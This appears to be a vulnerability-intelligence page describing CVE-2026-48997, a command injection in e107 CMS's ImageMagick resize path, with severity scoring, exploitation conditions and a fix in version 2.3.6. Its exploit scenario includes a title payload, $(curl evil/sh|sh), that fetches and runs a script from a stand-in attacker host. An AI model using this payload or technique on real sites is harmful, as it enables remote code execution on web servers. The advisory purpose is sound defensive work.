e107 CMS
CVE-2026-48997
HIGH
Severity by source
AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:H
Network-reachable via news submission (AV:N); five non-default prefs plus class membership justify AC:H; requires authenticated non-admin (PR:L); shell RCE as web user yields full CIA impact.
Primary rating from Vendor (GitHub_M).
CVSS VectorVendor: GitHub_M
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:H
Lifecycle Timeline
2DescriptionCVE.org
e107 is a content management system (CMS). Versions 2.3.5 and earlier contain a command injection vulnerability in the ImageMagick resize destination path. In resize_image(), the source path is escaped with escapeshellarg(), but the destination path is inserted inside raw double quotes in the convert command; in the submit-news upload flow, that destination filename includes the first six characters of user-controlled news title input. Because the title filter removes literal spaces but not tab characters, and shell expansions such as $(...) and backticks can survive into the quoted destination argument, /bin/sh -c may evaluate attacker-controlled input. Exploitation is possible only when all of the following non-default settings are enabled: resize_method=ImageMagick, subnews_attach=1, upload_enabled=1, subnews_resize is numeric between 30 and 5000, and the attacker is a non-admin in classes permitted by both subnews_class and upload_class. This issue has been fixed in version 2.3.6.
AnalysisAI
Command injection in e107 CMS versions 2.3.5 and earlier allows authenticated low-privilege users to execute arbitrary shell commands as the web server user via the news submission upload flow. The flaw lives in resize_image() where the ImageMagick convert destination path embeds a 6-character slice of the user-controlled news title without shell escaping, letting tab characters and $(...) / backtick expansions reach /bin/sh -c. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires all of the following on the target e107 site: site preference resize_method=ImageMagick (default is GD), subnews_attach=1, upload_enabled=1, subnews_resize set to a numeric value between 30 and 5000, and the attacker's user class must be permitted by both subnews_class AND upload_class. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The CVSS 3.1 base score of 7.1 (AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:H) reflects a network-reachable but high-complexity, low-privilege flaw with strong integrity/availability impact - consistent with shell command execution as www-data. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker registers a normal user account on a target e107 site whose admin has enabled ImageMagick resizing and reader news submission with attachments. They submit a news article whose title begins with six characters containing a tab followed by a shell substitution such as \t$(curl evil/sh|sh), then attach an image; when the upload handler invokes convert, /bin/sh -c expands the embedded command and the attacker gains code execution as the web server user. … |
| Remediation | Vendor-released patch: e107 v2.3.6 - upgrade from any 2.x release at or below 2.3.5 via https://github.com/e107inc/e107/releases/tag/v2.3.6 (commit 794a179f hardens the convert destination path). … Detailed patch versions, workarounds, and compensating controls in full report. |
Recommended ActionAI
Within 24 hours: Identify all e107 CMS deployments and document versions; disable news submission permissions for all non-administrator accounts; review access logs for unexpected news submission activity. …
Sign in for detailed remediation steps and compensating controls.
Threat intelligence, references, and detailed analysis are available after sign-in.
e107 CMS 3.2.1 has multiple XSS vulnerabilities in news comments that allow executing arbitrary JavaScript. Rated CVSS 9
usersettings.php in e107 through 2.3.0 lacks a certain e_TOKEN protection mechanism. Rated high severity (CVSS 8.8), thi
e107 2.1.8 has CSRF in 'usersettings.php' with an impact of changing details such as passwords of users including admini
e107 CMS version 3.2.1 contains a critical file upload vulnerability that allows authenticated administrators to overrid
e107 2.1.1 allows SQL injection by remote authenticated administrators via the pagelist parameter to e107_admin/menus.ph
e107 CMS version 3.2.1 contains a file upload vulnerability that allows authenticated administrative users to bypass upl
e107 CMS version 3.2.1 contains a file upload vulnerability that allows authenticated administrators to override server
e107_web/js/plupload/upload.php in e107 2.1.8 allows remote attackers to execute arbitrary PHP code by uploading a .php
Cross-site request forgery (CSRF) vulnerability in e107_admin/newspost.php in e107 1.0.1 allows remote attackers to hija
Multiple cross-site request forgery (CSRF) vulnerabilities in e107_admin/download.php in e107 1.0.2 allow remote attacke
e107 2.1.8 has XSS via the e107_admin/users.php?mode=main&action=list user_loginname parameter. Rated medium severity (C
Cross Site Scripting vulnerability in e107 v.2.3.2 allows a remote attacker to execute arbitrary code via the descriptio
Same weakness CWE-78 – OS Command Injection
View allSame technique Command Injection
View allShare
External POC / Exploit Code
Leaving vuln.today